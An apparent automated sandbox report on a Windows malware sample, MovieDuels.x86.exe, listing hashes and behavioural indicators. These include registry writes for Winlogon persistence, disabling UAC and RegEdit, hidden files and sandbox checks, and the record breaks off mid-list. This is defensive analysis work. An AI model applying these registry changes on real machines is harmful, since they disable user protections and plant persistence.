Resubmissions
30/03/2025, 21:06
250330-zx7lqsxsaz 1030/03/2025, 21:02
250330-zvd7eayrv4 830/03/2025, 20:49
250330-zmf12awyh1 10Analysis
-
max time kernel
687s -
max time network
688s -
platform
windows11-21h2_x64 -
resource
win11-20250313-en -
resource tags
arch:x64arch:x86image:win11-20250313-enlocale:en-usos:windows11-21h2-x64system -
submitted
30/03/2025, 20:49
Static task
static1
Behavioral task
behavioral1
Sample
MovieDuels.x86.exe
Resource
win11-20250313-en
Errors
General
-
Target
MovieDuels.x86.exe
-
Size
830KB
-
MD5
e0f676512de7503cf559cb1e5212e7e7
-
SHA1
6a19ca3de64e3d3e16d160d9b3f10a9019302660
-
SHA256
2b6d4cefa77ae47c33bbad9dba1dbce9f83a83ed31a0fc5039d24b2c649a7dca
-
SHA512
b31185e3a5af2421382d56b82c7329c092a5287005be3667638acb7c2ccaabe5a89c10695ccac97406e72bc1d52ac6865e9b0a84437875d8abe35f65d5fb60fa
-
SSDEEP
24576:hHKxoUWVvBO9Pw0JivckQxgiKZj3z4wBpdwV9RNdJB5nS3T4+LX:hqxnivmAj3z4wBpiSTRz
Malware Config
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\system32\\userinit.exe,C:\\launch.exe" reg.exe -
UAC bypass 3 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Disables RegEdit via registry modification 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-2081498128-3109241912-2948996266-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" reg.exe -
Sets file to hidden 1 TTPs 2 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 488 attrib.exe 1656 attrib.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\J: unregmp2.exe File opened (read-only) \??\R: wmplayer.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\A: unregmp2.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\I: unregmp2.exe File opened (read-only) \??\P: unregmp2.exe File opened (read-only) \??\Q: unregmp2.exe File opened (read-only) \??\P: wmplayer.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\W: unregmp2.exe File opened (read-only) \??\E: wmplayer.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\O: unregmp2.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\O: wmplayer.exe File opened (read-only) \??\T: wmplayer.exe File opened (read-only) \??\Y: wmplayer.exe File opened (read-only) \??\W: wmplayer.exe File opened (read-only) \??\L: unregmp2.exe File opened (read-only) \??\J: wmplayer.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\M: unregmp2.exe File opened (read-only) \??\X: unregmp2.exe File opened (read-only) \??\K: wmplayer.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\U: unregmp2.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\K: unregmp2.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\S: unregmp2.exe File opened (read-only) \??\A: wmplayer.exe File opened (read-only) \??\M: wmplayer.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\B: unregmp2.exe File opened (read-only) \??\L: wmplayer.exe File opened (read-only) \??\S: wmplayer.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\V: msiexec.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2081498128-3109241912-2948996266-1000\Control Panel\Desktop\wallpaper = "C:\\hello.jpg" reg.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\7-Zip\Lang\be.txt msiexec.exe File created C:\Program Files (x86)\7-Zip\Lang\ro.txt msiexec.exe File created C:\Program Files (x86)\7-Zip\Lang\ca.txt msiexec.exe File created C:\Program Files (x86)\7-Zip\Lang\hu.txt msiexec.exe File created C:\Program Files (x86)\7-Zip\Lang\kab.txt msiexec.exe File created C:\Program Files (x86)\7-Zip\Lang\zh-tw.txt msiexec.exe File created C:\Program Files (x86)\7-Zip\7zFM.exe msiexec.exe File created C:\Program Files (x86)\7-Zip\readme.txt msiexec.exe File created C:\Program Files (x86)\7-Zip\Lang\ast.txt msiexec.exe File created C:\Program Files (x86)\7-Zip\Lang\cy.txt msiexec.exe File created C:\Program Files (x86)\7-Zip\Lang\fr.txt msiexec.exe File created C:\Program Files (x86)\7-Zip\Lang\pa-in.txt msiexec.exe File created C:\Program Files (x86)\7-Zip\License.txt msiexec.exe File created C:\Program Files (x86)\7-Zip\Lang\br.txt msiexec.exe File created C:\Program Files (x86)\7-Zip\Lang\gu.txt msiexec.exe File created C:\Program Files (x86)\mover.exe No Escape.exe File created C:\Program Files (x86)\7-Zip\Lang\bn.txt msiexec.exe File created C:\Program Files (x86)\7-Zip\Lang\ga.txt msiexec.exe File created C:\Program Files (x86)\7-Zip\Lang\mn.txt msiexec.exe File created C:\Program Files (x86)\hello.reg No Escape.exe File created C:\Program Files (x86)\7-Zip\7-zip.chm msiexec.exe File created C:\Program Files (x86)\7-Zip\Lang\hy.txt msiexec.exe File created C:\Program Files (x86)\7-Zip\Lang\ru.txt msiexec.exe File created C:\Program Files (x86)\7-Zip\Lang\uk.txt msiexec.exe File created C:\Program Files (x86)\7-Zip\Lang\zh-cn.txt msiexec.exe File created C:\Program Files (x86)\erode.exe No Escape.exe File created C:\Program Files (x86)\7-Zip\7zG.exe msiexec.exe File created C:\Program Files (x86)\7-Zip\Lang\an.txt msiexec.exe File created C:\Program Files (x86)\7-Zip\Lang\fur.txt msiexec.exe File created C:\Program Files (x86)\7-Zip\Lang\hi.txt msiexec.exe File created C:\Program Files (x86)\7-Zip\Lang\sq.txt msiexec.exe File created C:\Program Files (x86)\7-Zip\7-zip.dll msiexec.exe File created C:\Program Files (x86)\7-Zip\Lang\mr.txt msiexec.exe File created C:\Program Files (x86)\7-Zip\Lang\ta.txt msiexec.exe File created C:\Program Files (x86)\7-Zip\Lang\cs.txt msiexec.exe File created C:\Program Files (x86)\7-Zip\Lang\nl.txt msiexec.exe File created C:\Program Files (x86)\msg.exe No Escape.exe File created C:\Program Files (x86)\7-Zip\Lang\en.ttt msiexec.exe File created C:\Program Files (x86)\7-Zip\Lang\id.txt msiexec.exe File created C:\Program Files (x86)\7-Zip\Lang\gl.txt msiexec.exe File created C:\Program Files (x86)\7-Zip\Lang\ps.txt msiexec.exe File created C:\Program Files (x86)\7-Zip\Lang\pt-br.txt msiexec.exe File created C:\Program Files (x86)\7-Zip\Lang\va.txt msiexec.exe File created C:\Program Files (x86)\7-Zip\Lang\bg.txt msiexec.exe File created C:\Program Files (x86)\7-Zip\Lang\eo.txt msiexec.exe File created C:\Program Files (x86)\7-Zip\Lang\lij.txt msiexec.exe File created C:\Program Files (x86)\7-Zip\Lang\nb.txt msiexec.exe File created C:\Program Files (x86)\7-Zip\7z.exe msiexec.exe File created C:\Program Files (x86)\7-Zip\Lang\et.txt msiexec.exe File created C:\Program Files (x86)\7-Zip\Lang\lv.txt msiexec.exe File created C:\Program Files (x86)\7-Zip\Lang\mng2.txt msiexec.exe File created C:\Program Files (x86)\hello.jpg No Escape.exe File created C:\Program Files (x86)\7-Zip\Lang\fy.txt msiexec.exe File created C:\Program Files (x86)\7-Zip\Lang\sw.txt msiexec.exe File created C:\Program Files (x86)\7-Zip\Lang\fi.txt msiexec.exe File created C:\Program Files (x86)\7-Zip\Lang\nn.txt msiexec.exe File created C:\Program Files (x86)\7-Zip\Lang\th.txt msiexec.exe File created C:\Program Files (x86)\7-Zip\Lang\vi.txt msiexec.exe File created C:\Program Files (x86)\7-Zip\Lang\ext.txt msiexec.exe File created C:\Program Files (x86)\7-Zip\Lang\io.txt msiexec.exe File created C:\Program Files (x86)\7-Zip\Lang\ku-ckb.txt msiexec.exe File created C:\Program Files (x86)\7-Zip\Lang\sl.txt msiexec.exe File created C:\Program Files (x86)\7-Zip\Lang\de.txt msiexec.exe File created C:\Program Files (x86)\7-Zip\Lang\he.txt msiexec.exe -
Drops file in Windows directory 16 IoCs
description ioc Process File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\UPnP Device Host\upnphost\udhisapi.dll svchost.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\SystemTemp\~DF1E823C80EB9745F0.TMP msiexec.exe File created C:\Windows\Installer\SourceHash{23170F69-40C1-2701-2401-000001000000} msiexec.exe File created C:\Windows\SystemTemp\~DF0DC1D0707EBB377D.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSIA13F.tmp msiexec.exe File opened for modification C:\Windows\Installer\e5ea0b2.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File created C:\Windows\Installer\e5ea0b6.msi msiexec.exe File created C:\Windows\SystemTemp\~DF05288F710F5904CC.TMP msiexec.exe File opened for modification C:\Windows\SystemTemp chrome.exe File created C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\UPnP Device Host\upnphost\udhisapi.dll svchost.exe File created C:\Windows\SystemTemp\~DF6D48324AB253F0DE.TMP msiexec.exe File opened for modification C:\Windows\SystemTemp chrome.exe File created C:\Windows\Installer\e5ea0b2.msi msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 5384 744 WerFault.exe 121 -
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language unregmp2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmplayer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language No Escape.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MovieDuels.x86.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmplayer.exe -
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000dd575b479d1d92260000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000dd575b470000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900dd575b47000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1ddd575b47000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000dd575b4700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Winword.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Winword.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Winword.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Winword.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Winword.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Winword.exe -
Enumerates system info in registry 2 TTPs 12 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily Winword.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Winword.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Winword.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily Winword.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Winword.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Winword.exe -
Modifies data under HKEY_USERS 21 IoCs
description ioc Process Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 msiexec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\27\52C64B7E msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "60" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28 msiexec.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent LogonUI.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00 LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" LogonUI.exe Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133878414171367013" chrome.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432" LogonUI.exe -
Modifies registry class 59 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000\AdvertiseFlags = "388" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Folder\shellex\ContextMenuHandlers\7-Zip msiexec.exe Key created \REGISTRY\USER\S-1-5-21-2081498128-3109241912-2948996266-1000_Classes\Local Settings chrome.exe Key created \REGISTRY\USER\S-1-5-21-2081498128-3109241912-2948996266-1000_Classes\.jp2 OpenWith.exe Set value (str) \REGISTRY\USER\S-1-5-21-2081498128-3109241912-2948996266-1000_Classes\.jp2\ = "jp2_auto_file" OpenWith.exe Set value (str) \REGISTRY\USER\S-1-5-21-2081498128-3109241912-2948996266-1000_Classes\jp2_auto_file\shell\open\command\ = "\"%ProgramFiles(x86)%\\Windows Media Player\\wmplayer.exe\" /Open \"%L\"" OpenWith.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\96F071321C0410724210000010000000 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000\SourceList\PackageName = "7z2401.msi" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000\SourceList\Net msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000\SourceList\Media msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files (x86)\\7-Zip\\7-zip.dll" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Drive\shellex\DragDropHandlers\7-Zip msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-2081498128-3109241912-2948996266-1000_Classes\jp2_auto_file\shell\open OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-2081498128-3109241912-2948996266-1000_Classes\jp2_auto_file\shell\play\command OpenWith.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\96F071321C0410720000000040000000\96F071321C0410724210000010000000 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000\SourceList\Net\1 = "C:\\Users\\Admin\\Downloads\\" msiexec.exe Set value (str) \REGISTRY\USER\S-1-5-21-2081498128-3109241912-2948996266-1000_Classes\jp2_auto_file\shell\ = "Play" OpenWith.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\96F071321C0410724210000010000000\Complete msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000\PackageCode = "96F071321C0410724210000020000000" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000\Language = "1033" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000\Version = "402718720" msiexec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000\Clients = 3a0000000000 msiexec.exe Key created \REGISTRY\USER\S-1-5-21-2081498128-3109241912-2948996266-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-620072444-2846605723-1118207114-1642104096-81213792-2370344205-2712285428\Children chrome.exe Set value (str) \REGISTRY\USER\S-1-5-21-2081498128-3109241912-2948996266-1000_Classes\jp2_auto_file\shell\play\MUIVerb = "@%SystemRoot%\\system32\\unregmp2.exe,-9991" OpenWith.exe Key created \REGISTRY\MACHINE\Software\Classes\Directory\shellex\ContextMenuHandlers\7-Zip msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32 msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000\DeploymentFlags = "3" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-2081498128-3109241912-2948996266-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-620072444-2846605723-1118207114-1642104096-81213792-2370344205-2712285428 chrome.exe Set value (str) \REGISTRY\USER\S-1-5-21-2081498128-3109241912-2948996266-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-620072444-2846605723-1118207114-1642104096-81213792-2370344205-2712285428\DisplayName = "Chrome Sandbox" chrome.exe Set value (str) \REGISTRY\USER\S-1-5-21-2081498128-3109241912-2948996266-1000_Classes\jp2_auto_file\shell\play\command\ = "\"%ProgramFiles(x86)%\\Windows Media Player\\wmplayer.exe\" /Play \"%L\"" OpenWith.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\Downloads\\" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-2081498128-3109241912-2948996266-1000_Classes\jp2_auto_file\shell OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-2081498128-3109241912-2948996266-1000_Classes\jp2_auto_file\shell\open\command OpenWith.exe Set value (str) \REGISTRY\USER\S-1-5-21-2081498128-3109241912-2948996266-1000_Classes\jp2_auto_file\shell\play\ = "&Play" OpenWith.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000\SourceList\Media\1 = ";" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-2081498128-3109241912-2948996266-1000_Classes\Local Settings chrome.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\ShellEx\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-2081498128-3109241912-2948996266-1000_Classes\jp2_auto_file\shell\play OpenWith.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000\ProductName = "7-Zip 24.01" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000\InstanceType = "0" msiexec.exe Set value (str) \REGISTRY\USER\S-1-5-21-2081498128-3109241912-2948996266-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-620072444-2846605723-1118207114-1642104096-81213792-2370344205-2712285428\Moniker = "cr.sb.odm3E4D1A088C1F6D498C84F3C86DE73CE49F82A104" chrome.exe Key created \REGISTRY\USER\S-1-5-21-2081498128-3109241912-2948996266-1000_Classes\jp2_auto_file OpenWith.exe Key created \REGISTRY\MACHINE\Software\Classes\*\shellex\ContextMenuHandlers\7-Zip msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000\AuthorizedLUAApp = "0" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\96F071321C0410720000000040000000 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000\SourceList msiexec.exe Key created \REGISTRY\USER\S-1-5-21-2081498128-3109241912-2948996266-1000_Classes\Local Settings OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-2081498128-3109241912-2948996266-1000_Classes\Local Settings OpenWith.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\96F071321C0410724210000010000000\Program = "Complete" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\96F071321C0410724210000010000000\LanguageFiles = "Complete" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000\Assignment = "1" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-2081498128-3109241912-2948996266-1000_Classes\Local Settings\MuiCache MiniSearchHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Directory\shellex\DragDropHandlers\7-Zip msiexec.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 1188 reg.exe -
NTFS ADS 3 IoCs
description ioc Process File opened for modification C:\Users\Admin\Downloads\NO-ESCAPE-main.zip:Zone.Identifier chrome.exe File opened for modification C:\Users\Admin\Downloads\Rainbow Six Siege Hacks_jp2.zip:Zone.Identifier chrome.exe File opened for modification C:\Users\Admin\Downloads\7z2401.msi:Zone.Identifier chrome.exe -
Runs .reg file with regedit 1 IoCs
pid Process 5572 regedit.exe -
Runs net.exe
-
Suspicious behavior: AddClipboardFormatListener 4 IoCs
pid Process 2176 Winword.exe 2176 Winword.exe 2356 Winword.exe 2356 Winword.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 4884 chrome.exe 4884 chrome.exe 5548 msiexec.exe 5548 msiexec.exe 2708 chrome.exe 2708 chrome.exe 2708 chrome.exe 2708 chrome.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 2296 OpenWith.exe 5752 OpenWith.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 53 IoCs
